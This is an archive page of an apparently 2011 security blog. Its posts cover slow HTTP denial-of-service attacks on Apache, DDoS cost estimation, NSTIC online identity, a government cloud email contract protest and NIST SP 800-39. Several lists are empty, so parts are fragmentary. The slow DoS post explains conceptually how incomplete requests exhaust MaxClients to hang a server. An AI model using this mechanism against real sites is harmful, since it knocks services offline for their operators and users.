Noms and IKANHAZFIZMA
Posted August 26th, 2011 by rybolovKickin’ it old-school with some kitteh overflows
Similar Posts:
Posted in IKANHAZFIZMA | No Comments »
Tags: infosec • lolcats • pwnage • security
Kickin’ it old-school with some kitteh overflows
Posted in IKANHAZFIZMA | No Comments »
Tags: infosec • lolcats • pwnage • security
Usually when you think about Denial of Service attacks nowadays, most people think up images of the Anonymous kids running their copy of LOIC in a hivemind or Russian Gangsters building a botnet to run an online protection racket. Now there is a new-ish type of attack technique floating around which I believe will become more important over the next year or two: the slow http attacks.
Refs:
How Slow DOS Works
Webservers run an interesting version of process management. When you start an Apache server, it starts a master process that spawns a number of listener processes (or threads) as defined by StartServers (5-10 is a good starting number). Each listener serves a number of requests, defined by MaxRequestsPerChild (1000 is a good number here), and then dies to be replaced by another process/thread by the master server. This is done so that if there are any applications that leak memory, they won’t hang. As more requests are received, more processes/threads are spawned up to the MaxClients setting. MaxClients is designed to throttle the number of processes so that Apache doesn’t forkbomb and the OS become unmanageable because it’s thrashing to swap. There are also some rules for weaning off idle processes but those are immaterial to what we’re trying to do today.
What happens in a slow DOS is that the attack tools sends an HTTP request that never finishes. As a result, each listener process never finishes its quota of MaxRequestsPerChild so that it can die. By sending a small amount of never-complete requests, Apache gladly spawns new processes/threads up to MaxClients at which point it fails to answer requests and the site is DOS’ed. The higher the rate of listener process turnover, the faster the server stops answering requests. For a poorly tuned webserver configuration with MaxClients set too high, the server starts thrashing to swap before it hits MaxClients and to top it off, the server is unresponsive even to ssh connections and needs a hard boot.
The beauty of this is that the theoretical minimum number of requests to make a server hang for a well-tuned Apache is equal to MaxClients. This attack can also take out web boundary devices: reverse proxies, Web Application Firewalls, Load Balancers, Content Switches, and anything else that receives HTTP(S).
Post photo by Salim Virji.
Advantages to Slow DOS Attacks
There are a couple of reasons why slow DOS tools are getting research and development this year and I see them growing in popularity.
Defenses
This part is fun, and by that I mean “it sucks”. There are some things that help, but there isn’t a single solution that makes the problem go away.
Posted in Cyberwar, DDoS, Hack the Planet, Technical | 7 Comments »
Tags: apache • ddos • infosec • pwnage • risk • scalability • security
So since I’ve semi-officially been granted the title of “The DDoS Kid” after some of the incident response, analysis, and talks that I’ve done, I’m starting to get asked a lot about how much the average DDoS costs the targeted organization. I have some ideas on this, but the simplest way is to recycle Business Continuity/Disaster Recovery figures but with some small twists.
Scoping:
Direct:
Indirect:
Brand damage, these vary from industry to industry and attack to attack:
Note that it’s reasonably easy to create example costs for small, medium, and large attacks and do planning around a medium-sized attack.
However we recycle BCP/DR figures for an outage, mitigation of the attack is different:
Posted in DDoS, Risk Management, Technical | No Comments »
Tags: ddos • infosec • moneymoneymoney • pwnage • scalability • security
OK, it’s been out a couple of months now with the usual “ZOMG it’s RealID all over again” worry-mongers raising their heads.
So we’re going to go through what NSTIC is and isn’t and some “colorful” (or “off-color” depending on your opinion) use cases for how I would (hypothetically, of course) use an Identity Provider under NSTIC.
The Future Looks Oddly Like the Past
There are already identity providers out there doing part of NSTIC: Google Authenticator, Microsoft Passport, FaceBook Connect, even OpenID fits into part of the ecosystem. My first reaction after reading the NSTIC plan was that the Government was letting the pioneers in the online identity space take all the arrows and then swoop in to save the day with a standardized plan for the providers to do what they’ve been doing all along and to give them some compatibility. I was partially right, NSTIC is the Government looking at what already exists out in the market and helping to grow those capabilities by providing some support as far as standardizations and community management. And that’s the plan all along, but it makes sense: would you rather have experts build the basic system and then have the Government adopt the core pieces as the technology standard or would you like to have the Government clean-room a standard and a certification scheme and push it out there for people to use?
Not RealID Not RealID Not RealID
Many people think that NSTIC is RealID by another name. Aaron Titus did a pretty good job at debunking some of these hasty conclusions. The interesting thing about NSTIC for me is that the users can pick which identity or persona that they use for a particular use. In that sense, it actually gives the public a better set of tools for determining how they are represented online and ways to keep these personas separate. For those of you who haven’t seen some of the organizations that were consulted on NSTIC, their numbers include the EFF and the Center for Democracy and Technology (BTW, donate some money to both of them, please). A primary goal of NSTIC is to help website owners verify that their users are who they say they are and yet give users a set of privacy controls.
Stick in the Mud photo by jurvetson.
Now on to the use cases, I hope you like them:
I have a computer at home. I go to many websites where I have my public persona, Rybolov the Hero, the Defender of all Things Good and Just. That’s the identity that I use to log into my official FaceBook account, use teh Twitters, log into LinkedIn–basically any social networking and blog stuff where I want people to think I’m a good guy.
Then I use a separate, non-publicized NSTIC identity to do all of my online banking. That way, if somebody manages to “gank” one of my social networking accounts, they don’t get any money from me. If I want to get really paranoid, I can use a separate NSTIC ID for each account.
At night, I go creeping around trolling on the Intertubes. Because I don’t want my “Dudley Do-Right” persona to be sullied by my dark, emoting, impish underbelly or to get an identity “pwned” that gives access to my bank accounts, I use the “Rybolov the Troll” NSTIC ID. Or hey, I go without using a NSTIC ID at all. Or I use an identity from an identity provider in a region *cough Europe cough* that has stronger privacy regulations and is a couple of jurisdiction hops away but is still compatible with NSTIC-enabled sites because of standards.
Keys to Success for NSTIC:
Internet users have a choice: You pick how you present yourself to the site.
Website owners have a choice: You pick the NSTIC ID providers that you support.
Standards: NIST just formalizes and adopts the existing standards so that they’re not controlled by one party. They use the word “ecosystem” in the NSTIC description a lot for a reason.
Posted in NIST, Technical | Comments Off on Realistic NSTIC
Tags: anonymity • compatibility • government • infosec • infosharing • management • NIST • nstic • scalability • security
Interesting blog post on Microsoft’s TechNet, but the real gem is the case filing and summary from the DoJ (usual .pdf caveat applies). Basically the Reader’s Digest Condensed Version is that the Department of Interior awarded a cloud services contract to Microsoft for email. The award was protested by Google for a wide variety of reasons, you can go read the full thing for all the whinging.
But this is the interesting thing to me even though it’s mostly tangential to the award protest:
So this is where I start thinking. I thunk until my thinker was sore, and these are the conclusions I came to:
And then there’s the “back story” consisting of the Cobell case and how Interior was disconnected from the Internet several times and for several years. The Rybolov interpretation is that if Google’s government cloud potentially has tribes as a tenant, it increases the risk (both data security and just plain politically) to Interior beyond what they are willing to accept.
Obligatory Cloud photo by jonicdao.
Posted in FISMA, NIST, Outsourcing | 2 Comments »
Tags: 800-37 • 800-53 • accreditation • certification • cloud • cloudcomputing • compliance • fisma • government • infosec • management • NIST • risk • security
You should have seen Special Publication 800-39 (PDF file, also check out more info on Fismapedia.org) out by now. Dan Philpott and I just taught a class on understanding the document and how it affects security managers out them doing their job on a daily basis. While the information is still fresh in my head, I thought I would jot down some notes that might help everybody else.
The Good:
NIST is doing some good stuff here trying to get IT Security and Information Assurance out of the “It’s the CISO’s problem, I have effectively outsourced any responsibility through the org chart” and into more of what DoD calls “mission assurance”. IE, how do we go from point-in-time vulnerabilities (ie, things that can be scored with CVSS or tested through Security Test and Evaluation) to briefing executives on what the risk is to their organization (Department, Agency, or even business) coming from IT security problems. It lays out an organization-wide risk management process and a framework (layer cakes within layer cakes) to share information up and down the organizational stack. This is very good, and getting the mission/business/data/program owners to recognize their responsibilities is an awesome thing.
The Bad:
SP 800-39 is good in philosophy and a general theme of taking ownership of risk by the non-IT “business owners”, when it comes to specifics, it raises more questions than it answers. For instance, it defines a function known as the Risk Executive. As practiced today by people who “get stuff done”, the Risk Executive is like a board of the Business Unit owners (possibly as the Authorizing Officials), the CISO, and maybe a Chief Risk Officer or other senior executives. But without the context and asking around to find out what people are doing to get executive buy-in, the Risk Executive seems fairly non-sequitor. There are other things like that, but I think the best summary is “Wow, this is great, now how do I take this guidance and execute a plan based on it?”
The Ugly:
I have a pretty simple yardstick for evaluating any kind of standard or guideline: will this be something that my auditor will understand and will it help them help me? With 800-39, I think that it is written abstractly and that most auditor-folk would have a hard time translating that into something that they could audit for. This is both a blessing and a curse, and the huge recommendation that I have is that you brief your auditor beforehand on what 800-39 means to them and how you’re going to incorporate the guidance.
Posted in FISMA, NIST, Risk Management, What Works | 5 Comments »
Tags: 800-37 • 800-39 • accreditation • assurance • auditor • C&A • certification • comments • compliance • datacentric • fisma • government • infosec • management • NIST • risk • scalability • security
« Previous Entries Next Entries »